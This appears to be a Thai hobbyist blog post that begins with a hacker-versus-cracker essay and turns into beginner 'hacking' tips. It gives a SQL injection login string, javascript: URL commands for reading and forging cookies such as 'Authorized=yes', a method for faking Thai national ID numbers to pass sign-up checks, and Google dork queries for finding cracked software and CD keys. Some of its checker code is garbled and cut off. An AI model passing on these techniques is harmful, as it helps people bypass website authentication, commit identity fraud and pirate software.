ขอบคุณความรู้ดีๆจาก WWW.OPENKORE.COM WWW.THAIKORE.COM WWW.OPKWIN.COM WWW.MOD2PLAY.COM และเวบอื่นๆที่ไม่ได้กล่าวถึงไว้ ณ.ทีนี้ด้วยนะคะ (ขอบคุณเป็นภาษาอังกฤษไว้ด้านบนนานแล้ว แต่เผื่ออาจมองกันไม่เห็นนะคะ เลยขอบคุณอีกรอบ)
เชิญชวนทำบุญแทนการเซทบอทให้โหลดฟรีคะ

ไม่บังคับนะคะ


แต่ใครเอาบอทไปใช้เองไม่ว่ากัน แต่ใครเอาบอทไปใช้ในทางธุรกิจ ไม่บริจาคขอให้จู้ดๆ อิอิ

ขอร้องจากใจ กรุณาอย่านำบอทไปขายเด็ดขาด ไม่ว่ากรณีใดๆทั้งสิ้น

2/17/2554

HACKER AND CRACKER

ความแตกต่างของ Hacker และ Cracker

เจาะลึกเรื่องคอมพิวเตอร์

เรายังสับสนกับความหมายของคำว่า Hacker และ Cracker กันอยู่ บางคนใช้คำสองคำนี้สลับกัน

Hacker คือบุคคลที่มีความสนใจความลึกลับซับซ้อนในการทำงานของระบบปฏิบัติการของคอมพิวเตอร์

แคร็กเกอร์ คือบุคคลที่บุกรุกเข้าไปยังระบบที่เป็นรีโมทแมชชีน และทำลายข้อมูลที่สำคัญ ปฏิเสธการใช้งานทุกอย่างที่ถูกกฎหมายทั้งหมด

ก่อน อื่นต้องขอทำความเข้าใจก่อนว่า ผมไม่ได้เป็นแฮกเกอร์ และไม่ได้สนับสนุนให้คุณเป็นแฮกเกอร์ด้วย บทความนี้เป็นการนำเสนอข้อมูลให้อ่านเพื่อเป็นความรู้และความบันเทิงเท่า นั้น

ความ จริงเรายังสับสนกับความหมายของคำว่า Hacker และ Cracker กันอยู่ บางคนใช้คำสองคำนี้สลับกัน ดังนั้นผมจึงขอทำความเข้าใจกับผู้อ่านก่อนว่า

Hacker คือ ผู้ที่มีความรู้ความสนใจความลึกลับซับซ้อนในการทำงานของระบบปฏิบัติการ แฮกเกอร์ส่วนใหญ่จะเป็นโปรแกรมเมอร์ที่มีความรู้เกี่ยวกับระบบปฏิบัติการ และระบบเครือข่าย เป็นอย่างดี และดีพอที่จะสามารถเห็นถึงช่องโหว่ของระบบรักษาความปลอดภัยของเครือข่าย ต่างๆ ได้ เมื่อสามารถ hack ระบบรักษาความปลอดภัยได้ จะติดต่อถึงผู้ควบคุมระบบนั้นๆ และนำความรู้ที่ทราบมาเปิดเผยให้ทราบ ถึงช่องโหว่ของระบบ เพื่อจะได้มีการแก้ไข โดยจะไม่ทำลายข้อมูล หรือสร้างความเสียหายให้แก่ระบบนั้นๆอย่างจงใจ สรุปก็คือ ผู้มีความรู้ความสามารถ และมี ethics ของ hacker นั่นเอง

Cracker คือผู้ที่บุกรุกเข้าไปในระบบคอมพิวเตอร์ หรือ ระบบที่เป็นรีโมทแมชชีนโดย ที่ไม่ได้รับอนุญาตแล้วก่อความเสียหายโดยเจตนาทำลาย/ขโมยข้อมูล/ก่อกวน ระบบ network การยกเลิกบริการปกติที่มีให้แก่ผู้ใช้ สร้างปัญหาให้แก่คอมพิวเตอร์เป้าหมายต่างๆ ปฏิเสธ การใช้งานทุกอย่างที่ถูกกฎหมายทั้งหมด แคร็กเกอร์ส่วนใหญ่จะถูกค้นพบได้ เนื่องจากการกระทำที่ทำให้เกิดความเสียหายดังกล่าว ทำให้ต้องถูกตามล่า ที่เห็นกันอยู่เป็นประจำคือ การ hack เข้าไปขโมย account ของ ISP/มหาวิทยาลัย

เกร็ดความรู้ : คุณรู้หรือไม่ ว่า... Dennis Ritchie กับ Brian Kernighan นอกจากเป็นคนที่คิดค้น ภาษา C แล้ว ยังเป็น Hacker อีกด้วย!

เอ๋!!! Bill Gates และ Paul Allen ผู้เป็นเจ้าของ Microsoft เป็น Hacker สมัยที่เป็นเด็กตอนอยู่ที่วอชิงตัน และ Linus Torvalds ผู้สร้างระบบปฏิบัติการ Linux ก็เป็น Hacker เช่นเดียวกันในขณะที่เรียนอยู่

Hack เป็นคำที่ใช้สำหรับเรียกการกระทำต่างๆที่เกี่ยวข้องกับการแก้ไขหรือเปลี่ยน แปลงระบบ คือการเข้าไปในระบบที่ผู้ทำการ hack ไม่มีสิทธิ์ การเข้าไปในเครื่องบริการที่มีระบบรักษาความปลอดภัย เป็นเป้าหมายสำคัญของ hacker เมื่อเข้าไปได้แล้วอาจกระทำการใด ๆ ทั้งที่เป็นประโยชน์ หรือโทษ กับระบบ ก็ขึ้นอยู่กับ hacker แต่ละคน อย่างเช่น
- เปลี่ยนการตั้งค่าๆในระบบต่างๆ เช่น โปรแกรม หรือเว็บไซต์
- การแก้ปัญหาในการเขียนโปรแกรมอย่างรวดร็ว
- การกระทำกับระบบด้วยวิธีการที่ไม่ได้ตั้งใจจะให้ทำ เช่น การแฮคเพื่อเข้าสู่ระบบต่างๆ

เอาหละ ในเมื่อเราพอรู้ถึงความหมายกันบ้างแล้ว ก็ลองมาดูเลยดีกว่า ว่า พวกนี้เค้ามีความรู้อะไรกันบ้าง...

บทความนี้ผมไม่ได้มีเจตตาอยากให้คนมาเป็นhacker เยอะๆ เพราะยิ่งhacker เยอะๆเท่าใดเครื่องคอมพิวเตอร์ที่คุณเล่นยิ่งปลอดภัยน้อยลง

ลองทำMisc ต่อเลยคับ****
คุณสมบัติผู้Hackและการแนะนำ
1.ขยัน ฝึกอดทน ไม่ติดเกมส์(เล่นได้แก้เครียดแต่มะใช่เล่นทั้งวัน)
2.ภาษาอังกฤษพอใช้ได้(เพราะคำสั่งทุกคำสั่งในการhackล้วนเป็นภาษาอังกฤษหมด)
3.ไม่หื่นหรือทำการhackเพื่อต้องการแค่show เพื่อนๆ
4.การhackในบางครั้งก็ปิดกฏหมายแต่ก็ไม่ทุกครั้ง
5.hackerต้องเรียนรู้อยู่ตลอด(ไม่ได้หมายความว่าคุณต้องนั่งแต่คอมพ์หัดhack)
6.hackerต้องมี IQ พอสมควรอยากรู้อยากลอง
7.Hacker จะไม่คิดว่าตัสเองเก่งแล้วหยิ่ง
8.อย่าสนใจในเรื่องไรสาระมากนัก
9.ไม่อวดเพื่อนๆว่าเราhackเป็นแล้ว
10.ไม่เปิดเผยตัวต่อสาธารณะ
11.ผู้เป็นhackerมะควรทำการhackโดยไม่มีเหตุผล
12.การหัดhackมะสามารถหัดให้เป็นได้ภายใน1วันบางคนอาจเป็นปี
13.หมั่นศึกษาบ่อยจากเว็ปGoogle เพราะเว็ปนี้มีข้อมูลทั้งหมดที่คุณอยากรู้
14.คุณไม่จำเป็นต้องซื้อหนังสือเสียเงินเป็นพันๆเพียงแค่คุรขยันหาข้อมูลในnetคุณก็สามารถเป็นhackerที่เก่งได้
15.ในการhackแต่ละครั้งคุณต้องใช้ความพยายามเป็นอย่างมากเพราะมันไม่เหมือนในหนังที่แค่พิมๆๆนิดๆๆแค่ 1-2 นาทีก็hackได้
16.ใน การhackบางอย่างจำเป็นต้องใช้โปรแกรมอาจหามาจากการโหลดหรือการ ใช้google โดยคุณต้องเข้าใจการทำงานของโปรแกรมนั้น มิฉะนั้นอาจทำร้ายต่อคุณเองเช่นการเขียน Virus หรือ Trojan
17.การเป็นhackerมะจำกัดอายุขอแค่สนใจและพอมีความรู้ด้านคอมพิมเตอร์นิดหน่อยเป็นพอ
18.อย่าเข้าใจผิดว่าhackerนั้นผิดกฏหมาย นักhacker บางคนก็หัดไปเพื่อทำงานด้าน Security หรือnetworkเพื่อให้รู้ทันhacker
19.hackerที่ทำงานผิดกฏหมายก็มีเยอะๆแยะเช่นการปลอมรหัสบัตรcreditเพื่อนำมาใช้
20.หากคุณเป็นคนเบื่ออาไรง่ายๆมะควรเป็นhacker
21.การหัดhackอาจส่งผลต่อการเรียน
22.hacker เป็นงานที่ได้เงินดีและสนุกแต่อาจลำบากนิดหน่อย
23.การเขียนโปรแกรมเป็นสิ่งจำเป็นของhacker

มาเริ่มหัดเป็นhackerกันดีกว่าเว็ปแรกที่ผมจะแนะนำคือ

http://try2hack.siamdev.net/index.php


เป็นเว็ปภาษาไทยเข้าใจง่ายมีwebboard ในการหาวิธีการและทำความเข้าใจ

เว็ป2
http://deathball.net/notpron/


เว็ปนี้จายากหน่อยเพราะเป็นภาษาอังกฤษทั้งหมดแต่จะมีคำใบ้

เหมาะสำหรับผู้เก่งแล้วเพราะจะมีด่านในการหัดhackกว่า70ด่าน


คำสั่งที่ต้องรู้ในการhack

javascript:alert(pwd);

ใช้สำหรับแสดงpassของเว็ปนั้นแต่มะได้ใช้ได้ในทุกเว็ป ใส่ตรงUrlพิมเลยงับ

''or''1''=''1 <<<<< คำสั่งเจาะระบบ SQl งับ javascript:alert( document.forms[x].y.value = "ข้อความ" ); เป็นคำสั่งในการhackเข้าระบบฐานข้อมูล โดยใส่ตรงUrl งับ โดย [X] : x ในนี่คือจำนวนคำสั่ง from ดูจาก view source โดยนำมา -1 ก่อนใส่ค่า เช่น คุณดู view source เจอคำว่า form 2 คำ ให้นำมาใส่ ใน วงเล็บเป็น [1] โดย มันจะพิมเป็นการเริ่มคำสั่งแล้วจึงพิมตามด้วย ค่า ลองนับดู y อชื่อของ forum นั้นลองๆๆทำดู หมายถึง ค่า Name อยู่ แถวๆ คำสั่ง Action อะคับ ดู Name= zzzzzzz ลองดูเอาใน view source คิดดู มันต้องการอาไรก็ดู name ตรงนั้น อื่นๆลองศึกษาดูคับ http://www.phoenixsnake.com/banchao/try2hack/help/play.php พาส 212224 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- บทความเล็กกับการ โกงบัตรประชาชนใช้ในการสมัคร User ของเว็ปต่างๆ หลักการโกงง่ายมาก สังเกตุมั้ยครับว่าทำไมระบบถึงรู้ว่าคุณใส่เลขบัตรประชาชนมั่ว แต่ในบางครั้งการมั่วของคุณกับใช้ได้ วิธีคิดง่ายๆ ยกตัวอย่างนะคับ 1 2 0 1 5 4 1 4 6 2 2 3 X Xคือเลขที่คุณต้องกรอกให้ถูกครับ มันเป็นเลขในการ check digit วิธีการให้ได้มาซึ่งหลักที่ 13 คือ นำเลขแต่ละตัว มาคุณตามหลักของมันคับ เช่น ขั้นตอนที่ 1 - เอาเลข 12 หลักมา เขียนแยกหลักกันก่อน (หลักที่ 13 ไม่ต้องเอามานะคร้าบ) 1 2 0 1 5 4 1 4 6 2 2 3 ขั้นตอนที่ 2 - เอาเลข 12 หลักนั้นมา คูณเข้ากับเลขประจำหลักของมัน รหัสบัตร 1 2 0 1 5 4 1 4 6 2 2 3 ตัวคูณ 13 12 11 10 9 8 7 6 5 4 3 2 ผลคูณ 13 24 0 10 45 32 7 24 30 8 6 6 ขั้นตอนที่ 3 - เอาผลคูณทั้ง 12 ตัวมา บวกกันทั้งหมด จะได้ 13+24+0+10+45+32+7+24+30+8+6+6=205 ขั้นตอนที่ 4 - เอาเลขที่ได้จากขั้นตอนที่ 3 มา mod 11 (หารเอาเศษ) จะได้ 205 mod 11 = 7 ขั้นตอนที่ 5 - เอา 11 ตั้ง ลบออกด้วย เลขที่ได้จากขั้นตอนที่ 4 จะได้ 11-7 = 4 (เราจะได้ 4 เป็นเลขในหลัก Check Digit) ถ้าเกิด ลบแล้วได้ออกมาเป็นเลข 2 หลัก ให้เอาเลขในหลักหน่วยมาเป็น Check Digit (เช่น 11 ให้เอา 1 มา, 10 ให้เอา 0 มา เป็นต้น) โอ้โห....มหัศจรรย์มาก ยอดเยี่ยมกระเทียมดอง เลขที่ได้ตรงกับเลขหลักที่ 13 ด้วยแหละ...ถ้าไม่เชื่อก็เอาเลขบัตรประชาชนตัวเองมาคำนวณดูสิครับ ผมคิดว่าหลายๆ คนคงมีคำถามในใจแล้วหละว่า ทำไมต้องเอามาคูณ 13 ทำไมต้องเอามา บวกกัน ทำไมต้องเอามา mod 11 คำตอบที่ผมให้ได้ก็คือ มันคือวิธีที่ถูกเลือกใช้ในการคำนวณ Check Digit ให้กับรหัสประชาชนครับ แต่ถ้าเราจะคำนวณ Check Digit ให้กับรหัสสินค้า หรือ ISBN ของหนังสือ เราก็ต้องใช้วิธีการคำนวณ ที่แตกต่างกันออกไปครับ ในเมื่อรู้วิธีแล้ว เรามาเขียนโปรแกรมตรวจสอบกันดีกว่า ผมเขียนไว้ให้หลายภาษาเหมือนกัน ให้เพื่อนๆ เลือกใช้ได้ตามสะดวกนะครับ เวอร์ชัน JavaScript function checkID(id) { if(id.length != 13) return false; for(i=0, sum=0; i รหัสประจำตัวประชาชน : เวอร์ชัน php รหัสประจำตัวประชาชน : เวอร์ชั่น ASP 3 รหัสประจำตัวประชาชน : "" Then If checkID(Request("txtID")) Then Response.Write "รหัสถูกต้องครับ" Else Response.Write "รหัสที่คุณกรอกไม่ถูกต้องครับ" End If End If %>

จริงๆ แล้วถ้าเพื่อนๆ จะเอาไปใช้จริง ก็ Copy ไปเฉพาะฟังก์ชัน CheckID ก็ได้ครับ โดยพารามิเตอร์ตัวแรกของ CheckID ทั้ง 3 ภาษานี้คือ ข้อความที่เก็บรหัสประจำตัวประชาชนไว้ครับ ฟังก์ชันนี้จะคืนค่าเป็น True ถ้ารหัสถูกต้อง และคืนค่าเป็น False ถ้ารหัสผิดครับ

สรุป
เรา ได้เรียนรู้วิธีการตรวจสอบเบื้องต้น (ข้อย้ำว่าเบื้องต้น) เพราะรหัสประชาชนที่ผู้ใช้กรอก อาจมี Check Digit ที่ถูกต้อง แต่อาจเป็นรหัสประชาชนที่ไม่มีอยู่จริงก็ได้นะครับ


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
TIP จาก google

วิธีลับในการหาข้อมูลจาก Google สามวิธี ใน Google ที่ให้ได้มาซึ่งทุกอย่าง ที่อยากดาวน์โหลด ในอินเตอร์เน็ต

คำแนะนำ คุณสามารถใช้วิธีนี้ ในการหาดาวน์โหลดโปรแกรม แคร็ก ซีดี คีย์ หรือต่างๆนานา ที่คุณอยากได้

วิธีที่หนึ่ง พิมพ์คำเหล่านี้ ใน Google Search
(1) "parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(2) "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(3) "parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(4) "parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(5) "parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(6) "parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

*** หมายเหตุ ให้คุณเปลี่ยน คำที่ตามหลัง parent directory เช่น MP3 Gamez appz DVDRip
เป็นสิ่งที่คุณอยากได้ แล้วก้อค้นหา คุณจะพบกับ ความมหัศจรรย์ใน Google

วิธีที่สอง พิมพ์คำต่อไปนี้ใน Google
?intitle:index.of? mp3
จากนั้นแค่เพิ่มชื่อ เพลง อัลบั้ม นักร้อง ลงไป เช่น ?intitle:index.of? mp3 myfavoritesongs

วิธีที่สาม พิมพ์คำต่อไปนี้ใน Google
inurl:micr0s0f filetype:iso
จากนั้น ก้อเปลี่ยน คำว่า micr0s0f กับคำว่า iso เป็นคำที่คุณต้องการ
เช่น inurl:myc0mpany filetype:zip

-------------------------------------------------------------------------------------------------------------------------
แหล่งอ้างอิง : http://www.projectw.org/viewtopic.php?t=1484


01. ไปที่ www.google.com

02. ในช่องใส่ข้อความให้ใส่แบบตัวอย่าง เช่น หาโปรแกรม Winamp
"parent directory " Winamp -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

03. กดปุ่มค้นหาแล้วรอเลือกผลลัพธ์ได้เลย
- - - - - - - - - - - - -
parent directory " /ชื่อโปรแกรม/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " ชื่อเกมส์ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " ชื่อMP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " ชื่อนักร้องหรืออัลบั้ม -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

แล้วแต่หัวดัดเปลงนะ มันมีอีกแยะเชียว เช่น

"Index of " /ชื่อโปรแกรม/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"Index of " ชื่อเกมส์ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"Index of " ชื่อMP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"Index of " ชื่อนักร้องหรืออัลบั้ม -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
เพิ่มส่วนของ cookie ให้เป็นภาษาไทยนะครับลองอ่านดู
A little introduction to Java Script

คำ ว่า Script มีความหมายว่าเป็น lightweight programming อ่าครับหมายถึง โปรแกรมที่เบาๆสั้นๆง่ายๆ ( อาจจะยาวก็ได้นะครับ หรือจะเขียนให้ซับซ้อนก็ได้ ) ใช้ในการควบคุมการทำงานของ application ต่างๆ

ถ้า หากเราพูดถึง Java Script มันก็เป็นภาษาโปรแกรมภาษาหนึ่งที่มี Syntax คล้ายๆกับภาษา C ไม่เหมือนกับ Java นะ( Java มีรากฐานมาจาก C/C++ ) นั่นก็คือถ้าหากว่าเขียนภาษา C เป็นก็จะอ่านภาษา Java Script ได้สบายสบายเลยล่ะครับ ลืมบอกไปว่า java script สามารถที่จะไม่ต้องประกาศตัวแปรก็ได้ครับผมใช้ได้เลย

Keyword และความหมาย

string :- ข้อความที่ถูกครอบด้วย ' หรือ " เช่น "a", "abc", 'a', 'abc'

การ เชื่อมต่อ string จะใช้เครื่องหมาย + ครับเช่น tempstring = "Phoenix" + "Snake"; จะได้ว่าค่าในตัวแปร tempstring มีค่าเป็น "PhoenixSnake" หรือเราจะใช้กับตัวแปรก็ได้ครับผมเช่นให้ a = "I"; b = "You"; c = 555; result = a + " Love " + b + " " + c; จะได้ว่า result มีค่าเป็น "I Love You 555" อ่าครับง่ายมั้ยครับ ^^ จะเห็นว่า string + ตัวเลขก็ได้เป็น string นะครับผม ค่าที่รับมาจาก form ทั้งหมดมันจะมองเป็น string ครับผม

วิธีการให้ Java Script ทำงานอย่างง่ายๆ ( สำหรับคนที่ไม่รู้ครับผมใครรู้แล้วข้ามไปโลด )

เปิด notepad หรือ text editor อาไรก็ได้ที่คุณมีอ่าครับ


พิม โค้ดลงไประหว่าง <!-- กับ //--> ครับผมหรือ copy มาวางก็ได้ หรือจะไม่เขียน <!-- กับ //--> ก็ได้ครับแต่ต้องเขียนให้มันอยู่ภายใต้ <script/> ครับ

    เสร็จแล้วก็ save ครับผมให้เป็น .html นะครับ .htm ก็ได้


    เสร็จแล้วให้ double click file html ที่เราสร้างขึ้นมาอ่าครับถ้ามันมีเหลืองๆข้างบนหน้าต่าง IE ก็ click ขวาแล้วเลือก allow block content อาไรประมาณนี้อ่าครับผม ^^

ลองมาดูคำสั่งสำคัญๆที่จำเป็นต่อการ hack กันดีกว่านะครับ ^^

    alert( string หรือ ตัวแปร หรือ รวมๆกัน ); เป็น function ที่ใช้ในการแสดงผลลัพธ์ขึ้นมาที่หน้าจอครับผม วิธีการใช้งานเช่น

       <script language="javascript">
       <!--
          alert( "Phoenix Snake ครับ" );
       //-->
       </script>      

    มันจะแสดงผลลัพธ์ดังรูป


    ตัวอย่างการใช้งาน
       <script language="javascript">
       <!--
          x = "I";
          y = "You";
          z = 555;
          alert( x + " Love " + y + " " + z );
       //-->
       </script>
     

   






<script language="javascript">
       <!--
          x = 1;
          y = 2;
          alert( x + " + " + y + " = " + ( x + y ) );
       //-->
       </script>
     

   
       <script language="javascript">
       <!--
          function haha( x ){
             return x + " ( ^^) ";
          }
          x = "Phoenix Snake";
          y = 10.345;
          z = haha( x );
          alert( x );
          alert( y );
          alert( z );
       //-->
       </script>
     






    ลองมาดูเทคนิคการเปลี่ยนค่าตัวแปรในขั้นตอนการ alert ดูนะครับผม ^^
    
       <script language="javascript">
       <!--
          function haha( x ){
             return x + " ( ^^) ";
          }
          x = "Phoenix Snake";
          y = 10.345;
          z = haha( x );
          alert( x + ( y = 20 ) );
          alert( y );
          alert( z );
          alert( z = 40 );
          alert( z );  
       //-->
       </script>









 







 





 











อันเดียวก็เพียงพอแล้วครับผม ^^

Javascript Injection

มา เข้าเรื่องเราซักทีนะครับผม วิธีการข้างต้นเนี่ยสามารถที่จะทำได้ในกรณีที่หน้าเวบไม่มีการตรวจสอบว่า ข้อมูลที่ส่งมานั้นส่งมาจากที่ไหนเราสามารถที่ view source แล้วเอามา save แก้ไขค่าต่างๆแล้วก็สั่งให้มันทำงานด้วยการเรียก file ที่มีนามสกุล .html ขึ้นมาทำงาน หรืออาจจะกด refresh ถ้าเปิดขึ้นมาแล้วแต่ถ้าหากว่า server มีการตรวจสอบให้ค่าที่ส่งต้องส่งมาจากหน้าที่ทำงานอยู่บน server นันเท่านั้น ( ถ้าส่งจากที่อื่นมันจะบอกว่า wrong refer )เราก็ไม่สามารถที่จะใช้งานแบบธรรมดาได้ ดังนั้นเราจะใช้จุดอ่อนของ Java script ในการ hack เราเรียกวิธีการนี้ว่า Java Injection เนื่องจากว่าใน header ของแต่ละ content มีการใช้งาน protocols ที่เรียกว่า javascript ดังนั้นเราสามารถที่จะเขียน code ลงไปบนหน้านั้นได้เลยโดยโค้ดนั้นสามารถที่จะไปเปลี่ยนแปลงค่าที่มีอยู่ได้ อ่าครับผม

I. Injection Basics

เรา สามารถที่จะทำการ inject( แปลว่าแทรกเข้าไป ใส่เข้าไป เหมือน การฉีดยาอ่าครับ ) ด้วยการเขียนคำว่า javascript: แล้วตามด้วย code ธรรมดาๆของเรานี่แหละครับผมลองทำดูนะ

ขั้นแรกเรยก็เข้าเวบที่ต้องการจา hack อ่านะครับผม สมุติว่าเป็น hotmail


click 1 ทีที่ URL จะทำให้เป็นสีฟ้าอ่านะครับ


พิม javascript: ลงไปเลยเย่



 

ลองพิมอาไรก็ได้อ่าครับผม ใช้แต่ alert ก็ได้ไม่ต้องใช้ void หรอกพวกเราเก่งอ่า ^^ เนอะๆ




เสร็จแล้วกด Enter เลย



เป็นกันแล้วใช่มั้ยล่ะครับผม ต่อไปมาลองเล่นๆกันดูนะ click ไป training ground กันเลย นี่แหละครับ
II. Cookie Editing

นี่เรื่อง cookie นะครับผมใช้ alert(); ก็ได้ไม่ต้องใช้ void(); อิอิลองอ่านเพิ่มนะครับผม ไม่ยากๆอ่านไม่ออกดูตัวอย่างเค้าก็ได้ครับ

คือว่าเห็นว่าบางคนอ่านภาษาอังกฤษไม่ออกอาครับก็เลยแปลให้

ขั้นแรกก็ไปที่เวบที่ต้องการจะ hack แล้วก็ใส่ไอนี่ เข้าไปนะครับ ทำเหมือนด่าน 9 ง่ะครับ

javascript:alert( document.cookie );

แล้ว เราก็จะเห็นข้อมูล cookie นะครับมันจะเป็นชื่อตัวแปรแล้วก็จะเป็นค่าของมันครับ ( ถ้าหากว่าบางทีไม่เห็นล่ะก็ลองกด submit ดูก่อนนะครับแล้วค่อยใส่ไอนั่นเข้าไป ) เวลาเราจะแก้ค่าที่อยู่ในนั้นก็ใส่

javascript:void(document.cookie="Field = myValue");

แบบนี้นะครับจะใช้เป็นเหมือน alert แทนก็ได้ไม่ต้องใช้ void(); ถ้าจาใช้เป็น alert ก็อย่างนี้ครับ

javascript:alert( document.cookie="Field = myValue" );

ตัวอย่างเช่น

javascript:alert( document.cookie="Authorized=yes" );

มันจะเป็นการทำให้ค่าในตัวแปร Authorized ซึ่งอยู่ใน cookie มีค่าเท่ากับ yes

ไม่ ต้องใช้ void() ก็ได้ครับ void() มันทำหน้าที่แค่ไม่ส่งค่า return ออกมาครับไม่ได้ต่างจาก alert() เพราะ ว่า alert() มันก็ return เป็น void อยู่แล้ว เอาเป็นว่ามันใช้แทนกันได้ครับ ^^

ขอบคุณครับ

การแกะรอย(FingerPrint)

ใน วินโดว์นั้น การแกะรอยต่างๆจากเครื่องอื่นๆในวงแลนหน่วยงานก็ตาม หรือจะเป็นใน Internet ก็ตามทีรวมไปถึง Website ต่างๆ คุณจำเป็นต้องอาศัยเครื่องมือต่างๆ(โปรแกรม) ซึ่งถ้าเก๋าหน่อยคุณสามารถที่จะเปิดดอสมาแล้วพิมพ์ก็ได้แล้ว แต่ถ้าไม่เก๋าจริงๆก็ควรหาโปรแกรมต่างๆมาใช้งาน ซึ่งโปรแกรมสมัยนี้การใช้งานและแสดงผลต่างๆ ดูง่ายต่อความเข้าใจ เรามาเริ่มทำความเข้าใจก่อนเกี่ยวกับพื้นฐานนะครับ

เรียบเรียงโดย : ภูวดล ด่านระหาญ
เรียบเรียงเมื่อ : 27 กันยายน 2544

บทนำ
การ ที่ผู้บุกรุกจะกระทำการใดๆ กับเป้าหมายนั้น ส่วนใหญ่มักจะต้องมีกระบวนการในการสะสมข้อมูลเกี่ยวกับเป้าหมายนั้นๆ ก่อน จากนั้นจึงจะลงมือบุกรุกเข้าไปยังเป้าหมายที่ต้องการ และถ้าทำได้สำเร็จผู้บุกรุกอาจจะติดตั้งซอฟแวร์บางตัวเพื่อซ่อนร่องรอยหรือ ติดตั้ง backdoor ไว้ในระบบ เพื่อจะได้เข้ามาใช้งานได้ง่ายๆ ในครั้งต่อไป

ใน ขั้นตอนของการหาข้อมูลของเครื่องเป้าหมายนั้น ผู้บุกรุกจำเป็นต้องทราบว่าเครื่องเป้าหมายนั้น service อะไรอยู่บ้าง และถ้าได้ข้อมูลของ network topology และระบบปฏิบัติการด้วยแล้วก็จะเป็นข้อมูลที่มีประโยชน์มาก มีเครื่องมือหลายตัวและมีหลายวิธีในการตรวจสอบ network topology และ service ของเครื่องเป้าหมาย Firewalk ก็เป็นอีกเครื่องมือหนึ่งที่ David Goldsmith และ Michael Schiffman สร้างขึ้นมา โดยลักษณการทำงานจะคล้ายๆ กับ traceroute เพื่อใช้ตรวจสอบว่ามี service อะไรที่ไฟร์วอลล์เปิดให้ผ่านเข้าไปได้ และใช้ตรวจสอบ access control ได้ด้วย

***โดยส่วนใหญ่แล้วไฟร์วอลล์มักจะถูกคาด หวังจากผู้ใช้งานว่า จะเป็นตัวที่ทำหน้าที่ปกป้องเครือข่ายจากโลกภายนอก แต่ Firewalk ก็ได้แสดงให้เห็นแล้วว่าไม่ได้เป็นเช่นนั้นเสมอไป ผู้บุกรุกยังมีโอกาสในการหาข้อมูลเกี่ยวกับเป้าหมายมากกว่าที่เราคาดการณ์ ไว้ และในการที่จะทำความรู้จักกับหลักการทำงานของ Firewalk จะต้องเข้าใจ traceroute เสียก่อน

Traceroute (อ่านว่า เทรซเร้าว์) อ่านผิดอายเค้าแย่เลย
คำ สั่ง tracert (Windows) หรือ traceroute (*NIX) เป็นเครื่องมือช่วยในการตรวจสอบเครือข่าย โดยจะแสดง IP ของ router หรือ gateway ที่ packet วิ่งผ่านจากที่หนึ่งไปยังอีกเครือข่ายหนึ่งทีละ hop โดย traceroute ใช้คุณสมบัติของ IP Time To Live (TTL) ในการทำงาน

TTL ถูกนำไปใช้ในโปรโตคอล IP เพื่อป้องการการเกิดลูปที่ไม่รู้จบจากการวนของ pakcet โดยในแต่ละ device ที่ได้รับ packet จะลดค่าของ TTL ลงทีละ 1 และถ้า TTL มีค่าเป็นศูนย์หรือน้อยกว่า packet นั้นจะถูก drop ไป และ router ก็จะส่งข้อมูล ICMP "TTL Exceed in Transit" กลับมายังเครื่องที่รันคำสั่งนี้

Traceroute ใช้หลักการนี้ในการทำงาน โดยมันจะกำหนดค่า TTL counter ที่ทำให้ router ที่ packet ผ่านไปนั้นต้องสร้าง ICMP message กลับมาเสมอ สำหรับคำสั่ง tracert ใน Windows นั้น จะใช้ ping (ICMP Echo) เป็นตัวส่ง packet ออกไป ในขณะที่ traceroute ใน Unix นั้น จะใช้ UDP datagram เป็นตัวส่งข้อมูลออกไป datagram ที่ถูกส่งออกไปนั้นจะถูกส่งไปยัง port 33434 โดยดีฟอลต์ และ ค่าหมายเลข port นี้จะถูกเพิ่มขึ้นเมื่อได้รับ packet ที่ตอบกลับมาอย่างถูกต้อง โดยปกติแล้ว traceroute มักจะส่ง datagram ออกไปจำนวน 3 datagram เพื่อป้องกันการสูญหายระหว่างทาง

ด้านล่างนี้แสดงตัวอย่างการใช้ tracert.exe ใน Windows
C:\WINDOWS>tracert quote.yahoo.com
Tracing route to finance.yahoo.com [204.71.203.155]
over a maximum of 30 hops:
1 99 ms 100 ms 119 ms tnt3.culpeper.va.da.uu.net [206.115.221.174]
2 99 ms 119 ms 115 ms 206.115.233.205
3 106 ms 104 ms 102 ms Fddi0-0.HR1.DCA1.ALTER.NET [137.39.33.130]
4 112 ms 95 ms 113 ms 102.ATM3-0.XR1.DCA1.ALTER.NET [146.188.160.254]
5 103 ms 98 ms 104 ms 195.at-7-2-0.XR1.DCA8.ALTER.NET [146.188.163.6]
6 98 ms 111 ms 111 ms POS6-0.BR3.DCA8.ALTER.NET [152.63.36.5]
7 110 ms 102 ms 104 ms 137.39.52.18
8 106 ms 104 ms 112 ms pos2-0-155M.cr1.WDC2.gblx.net [208.178.174.53]
9 172 ms 180 ms 167 ms pos7-0-2488M.cr2.SNV.gblx.net [208.50.169.86]
10 168 ms 165 ms 167 ms ge1-0-1000M.hr8.SNV.gblx.net [206.132.254.41]
11 168 ms 174 ms 165 ms bas1r-ge3-0-hr8.snv.yahoo.com [208.178.103.62]
12 176 ms 169 ms 175 ms finance.yahoo.com [204.71.203.155]
Trace complete.

